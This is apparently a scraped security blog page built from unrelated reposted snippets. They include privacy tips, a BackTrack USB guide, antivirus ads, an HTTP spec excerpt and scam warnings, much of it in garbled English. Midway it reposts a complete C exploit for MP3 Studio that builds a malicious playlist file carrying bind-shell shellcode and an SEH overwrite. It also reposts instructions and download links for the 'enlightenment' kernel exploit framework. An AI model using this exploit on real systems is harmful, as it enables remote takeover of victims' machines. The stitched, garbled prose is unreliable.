Addition restore deleted files a false moment, FileWing can also delete files permanently. FileWing will find deleted files and displays them. During not overwritten, the file is not a problem to be saved. FileWing can also delete the data completely to overwrite it again.
Tips
FileWing also able to handle an external drive. Thus, this application is suitable for rescue deleted photos on digital cameras.
Source
Facebook users are easy prey for criminals along with the number of people share information. Every day people put themselves at risk by clicking on an imprudent to invitations sent by friends to join the group or write in their walls.
Think about what you add.
Receiving a request provided by a new friend asks posting, photo messaging and information about your personal background. Watch your friends list and think back to who is entitled to access your personal stuff.
Check the privacy settings. Facebook recently did the update, set the privacy from scratch can be very meaningful.
Footwear of being on Facebook. Do share your photos? Stay in touch with other people? Share links and updates the activity? Ask yourself what you want to obtain a personal profile. Thus, cut will be more personal information that is publish
Source and read the complete article
As many 50 passwords and some important documents you can store the data into DataInherit online services. A Free service that combines online stroge and data privacy gives allocation of file storage for 10 mb. Another advantage, through the iPhone, you can also access an account that has been made.
Source
If you want to have Back Track 4 on USB with persistent changes and want to make it bootable USB with linux just follow the instructions in the article How To: “Make bootable USB to save changes – Back Track 3 on USB with persistent changes“. The instructions are the same for BT4. (By the way, this post is written for my personal use with a help I found somewhere online, I post it here to show my hardware compatability).
To make BT4 bootable with persistent changes I used 2 USB sticks. The first to launch Back Track (BT2,3 or4) without any changes and the second to prepare and make all changes in linux for my Back Track 4. I used 2 USB sticks because it is easier.
Well, when you finish Step 5 you will need to follow the instructions below:
Let’s say we have a formatted second partition, mount it and create a changes directory in the root of the file system. Open shell and execute these commands:
mount /dev/sdc2 /mnt/sdc2
cd /mnt/sdc2
mkdir changes
Don’t forget that it can be sdc2 but not sdb2. It depends on your computer and configurations. If you use 2 USB sticks there should be sdc2. next we will make some changes to how the system boots. Now execute these commands:
cd /boot/syslinux
chmod +Xx lilo
chmod +Xx syslinux
Then you need to open syslinux.cfg and modify it. To do that execute the commands:
cd /mnt/sdc1/boot/syslinux
kwrite syslinux.cfg
I copied the boot definition I wanted to change and created a new entry so I would have a fall back option if something became broken. well, in the file find:
1. “LABEL BT4″
2. Copy this line and next 3 lines and paste all these lines below existing 4 lines. Well, now we have the same 4 lines. Our new section.
3. Change the “LABEL BT4″ to something you want like “LABEL BT4-persistent” and description to something like “MENU LABEL BT4 Beta – Console – Persistent”.
4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw” where the x is the drive appropriate for your system. In my case it looks like this, “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that goes after “rw”. I think there should be “quite” or something similar at the end of the line. Just delete this word.
5. Save your changes and exit the editor.
That should work fine now. Reboot and select the option you setup configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all instruction step by step you won’t have any errors.
Source
This guide explains how to set up mod_chroot with Apache2 on a Fedora 12 system. With mod_chroot, you can run Apache2 in a secure chroot environment and make your server less vulnerable to break-in attempts that try to exploit vulnerabilities in Apache2 or your installed web applications. I do not issue any guarantee that this will work for you!
Preliminary Note
I'm assuming that you have a running Fedora 12 system with a working Apache2, e.g. as shown in this tutorial: The Perfect Server - Fedora 12 x86_64 [ISPConfig 2]. In addition to that I assume that you have one or more web sites set up within the /var/www directory (e.g. if you use ISPConfig).
Source and read this full article at HowToForge
In the areas where it really counts, Kaspersky Internet Security 2010 does a fantastic job at detecting, preventing, and eliminating viruses, spyware, adware, and other malicious software.
We like Kaspersky a lot, and they've consistently been one of the best, most innovative antivirus security software vendor for many years.
Our testing showed excellent results in all areas of security protection with only a couple of areas that could use further revision.
Overall, Kaspersky delivers excellent virus and malware protection, but only average anti-phishing and parental controls, and a less-than-perfect firewall.
IMPROVED FEATURES
• Great Antivirus Protection
• Better Spyware Protection
• Solid Real-time Coverage
Every year brings significant progress from Kaspersky; we hope they'll improve some of their deficiencies this year (and lower the price.) Regardless though, Kaspersky is a terrific Internet Security suite for anyone.
Header Field Definitions
This section defines the syntax and semantics of all standard HTTP/1.1 header fields. For entity-header fields, both sender and recipient refer to either the client or the server, depending on who sends and who receives the entity.
Accept
The Accept request-header field can be used to specify certain media types which are acceptable for the response. Accept headers can be used to indicate that the request is specifically limited to a small set of desired types, as in the case of a request for an in-line image.
Accept = "Accept" ":"
#( media-range [ accept-params ] )
media-range = ( "*/*"
| ( type "/" "*" )
| ( type "/" subtype )
) *( ";" parameter )
accept-params = ";" "q" "=" qvalue *( accept-extension )
accept-extension = ";" token [ "=" ( token | quoted-string ) ]
The asterisk "*" character is used to group media types into ranges, with "*/*" indicating all media types and "type/*" indicating all subtypes of that type. The media-range MAY include media type parameters that are applicable to that range.
Each media-range MAY be followed by one or more accept-params, beginning with the "q" parameter for indicating a relative quality factor. The first "q" parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1. The default value is q=1.
Note: Use of the "q" parameter name to separate media type
parameters from Accept extension parameters is due to historical
practice. Although this prevents any media type parameter named
"q" from being used with a media range, such an event is believed
to be unlikely given the lack of any "q" parameters in the IANA
media type registry and the rare usage of any media type
parameters in Accept. Future media types are discouraged from
registering any parameter named "q".
An intrusion detection system (IDS) is a device (or application) that monitors network and/or system activities for malicious activities or policy violations.
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization.
IDPSs typically record information related to observed events, notify security administrators of important observed events, and produce reports. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding.They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g., reconfiguring a firewall), or changing the attack’s content.
Source
Haiti recently hit by powerful earthquake. Haiti beaten by 7 earthquake richter scale. The impact of the earthquake is very sad. Victims of the earthquake was not a bit. An estimated 75 thousand people buried in rubble and about 200 thousand people were killed by the earthquake. Assistance from all over the world came. Donations through the virtual world is emerging. It turned out to have been exploited by online criminals.
Online criminals deceive via email and fake websites designed to steal what should be a charitable donation. Symantec has seen online scams spread with themes including Haiti earthquake spam email asking for donations and manipulate search results that can infect computers with malware.
Symantec security experts called on computer users to follow the smart ways to be safe online, and ensure that your donations and assistance to disaster victims and not to con men.
When contributing to a charity online, always remember:
Avoid clicking on suspicious links in emails or IM messages because it may be a link to a fake website. Symantec security experts recommend to type the Web address, such as the Web address charitable organizations, directly into the browser instead of clicking the link in the message.
Do not ever fill out a form in a message requesting personal information, financial or password. A charitable organization has a reputation can not be asked for personal information via e-mail. If you are in doubt, contact the organizations directly concerned by a trusted independent mechanism, such as phone numbers have been verified, or Internet address that you enter into a new browser menu (do not click on or cut and paste the link in the message).
/* mplode.c vs MP3 Studio v1.0
* Tested on: Windows 2000 SP4
*
* Author: Dominic Chell
*
* PoC: http://www.milw0rm.com/exploits/9277
* The PoC author said he could not exploit it so I decided to try.
*
* A bit of fun for a boring night in Peterborough :(
* Good luck finding someone who uses this media player.
*/
#include "stdafx.h"
#include
#include
#include
#include
#define usage(){ (void)fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}
// bind shell lport = 4444
char shellcode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";
char *seh = "\xC4\x2A\x02\x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "\xeb\x10\x90\x90";
// short jmp nop nop
int main(int argc, char *argv[])
{
char outfile[20];
if(argc < 2)
{
usage();
return 0;
}
if(strlen(argv[1])<15)
{
strncpy(outfile, argv[1], 14);
outfile[14] = '\0';
}
else strcpy(outfile, "mplode.m3u");
FILE *fp = fopen(outfile, "w");
if (!fp) error("[*] Cannot output file\n");
fwrite("http://", 7, 1, fp);
for (int i=0; i<4103; i++)
{
fwrite("\x41", 1, 1, fp);
}
fwrite(nextseh, 4, 1, fp);
fwrite(seh, 4, 1, fp);
for (int i=0; i<500; i++)
{
fwrite("\x90", 1, 1, fp);
}
fwrite(shellcode, sizeof(shellcode), 1, fp);
fclose(fp);
fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc
fprintf(stderr, "[*] Success, exploit written to %s\n", outfile);
exit(0);
return 0;
}
source milw0rm.com
Fully Automated Real-Time Protection
Kaspersky Internet Security 2010 stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers:
* Keeps your money and identity safe
* Protects against bank account fraud
* Safeguards against online shopping threats
* Cybercriminals won’t hi-jack your PC
* Family protection from on-line predators
* Your files won’t be ruined by hackers
* Keeps your PC running smoothly
* Safer Wi-Fi connections
* Two way personal firewall
New And Improved Features
Kaspersky Internet Security 2010 offers a number of new and improved features together with unique protection technologies to address the latest online threats, keep your PC running smoothly and customize protection according to your activities:
* Unique Safe Run Mode for questionable applications and websites
* Security Application Monitor to give you full picture on programs installed on your PC
* Identity Information Controller to give valuable data an extra layer of protection
* Kaspersky Toolbar for Internet browsers to warn you about infected or unsafe websites
* Advanced identity theft protection, including improved secure Virtual Keyboard
* Urgent Detection System to stop fast emerging threats
* Next generation proactive protection from zero-day attacks and unknown threats
* Special Game Mode to suspend alerts, updates and scans while you play
Advanced Features For Better Protection
To create your own exploit module for enlightenment, just name it
exp_whatever.c
It will be auto-compiled by the run_exploits.sh script and thrown into
the list of loaded exploit modules
Each module must have the following features:
It must include this header file, exp_framework.h
A description of the exploit, the variable being named "desc"
A "prepare" function: int prepare(unsigned char *ptr)
where ptr is the ptr to the NULL mapping, which you are able to write to
This function can return the flags described below for prepare_the_exploit
Return 0 for failure otherwise
A "trigger" function: int trigger(void)
Return 0 for failure, nonzero for success
A "post" function: int post(void)
This function can return the flags described below for post_exploit
A "get_exploit_state_ptr" function:
int get_exploit_state_ptr(struct exploit_state *ptr)
Generally this will always be implemented as:
struct *exp_state;
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
It gives you access to the exploit_state structure listed below,
get_kernel_sym allows you to resolve symbols
own_the_kernel is the function that takes control of the kernel
(in case you need its address to set up your buffer)
the other variables describe the exploit environment, so you can
for instance, loop through a number of vulnerable socket domains
until you detect ring0 execution has occurred.
That's it!
*/
http://www.grsecurity.net/~spender/enlightenment.tgz
back: http://milw0rm.com/sploits/2009-enlightenment.tgz
source milw0rm.com
Automate Your Penetration Testing
AVDS is a network vulnerability assessment appliance for networks of 50 to 200,000 nodes. It performs an in-depth inspection for security weaknesses that can replace exhaustive penetration testing. With each scan it will automatically find new equipment and services and add them to the inspection schedule. It then tests every node based on its characteristics and records your system's responses.
In a matter of hours and with no network down time or interruption of services AVDS will generate detailed reports specifying network security weaknesses.
Our database of tests is updated daily with the most recently discovered security vulnerabilities. The AVDS database includes over 10,000 known vulnerabilities and the updates include discoveries by our own team and those discovered by corporate and private security teams around the world.
Simple, Fast and Comprehensive
Manual vulnerability assessment is expensive and infrequently done. Assessment software can be time consuming to set up and operate, plagued by high false positive rates and cause network resource issues.
Automated Testing Using AVDS:
• Gets your tactical security work done routinely and quickly
• Provides the fixes you and your staff need for fast mitigation
• Buys you time to focus on security strategy
• Automatically scans new equipment, ports and applications
• Scales to handle multiple networks, business units, countries
• Reduces your patch-work by identifying exactly what is needed.
Security and Compliance Challenges
Read More
Network security threat is one of the major concerns for all online businesses today. As soon as the computer software was produced the hackers set off on their task of destroying software. In networks the more important thing than software is the data as the data contain sensitive information. Hackers send their programs to either destroy the data bases or steal data. Both are equally dreaded by network administrators.
Network security threat
Web hosting is now widely used of netter to introduce their web commercial nette, lot from year to year using good web hosting service is paid or for free, and many benefits if we use the web-hosting, some of which we become more web easy to remember, unique and certainly more commercially profitable.
technically, the use of web hosting can be seen from some of the features available, because many web hosting providers that offer additional features such as relatively low prices, large disk space, usage period and warranty service, even free web hosting providers even dare to compete with providers are paid, our living choices.
Through this website, the netter can choose web hosting providers the most demanding of the world, best 10 web hosting sites that dare to compete provided from various sides, ranging from price, how to setup, domain, disk space, money back, and the usage period .
Through this website explained that the list of top web hosting is the most widely sought after by netter, affordable prices is one reason why the netter choose one of the ten web hosting these sites.
how about you? are already interested in using the best web hosting around the world to introduce your personal website?
The 10 top web hosting sites are among others BlueHost, JustHost, inmotion hosting, HostMonster, fatcow, supergreen, HostGator, 1and1, GoDaddy, and the last isyahoo web hosting, good luck
ShineShadow Security Report 15092009-09 TITLE Local privilege escalation vulnerability in Protector Plus antivirus software BACKGROUND Protector Plus range of antivirus products are known the world over for their efficiency and reliability. Protector Plus Antivirus Software is available for Windows Vista, Windows XP, Windows Me, Windows 2000, Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector Plus Antivirus Software is the ideal antivirus protection for your computer against all types of malware like viruses, trojans, worms and spyware.
Posts
All Comments
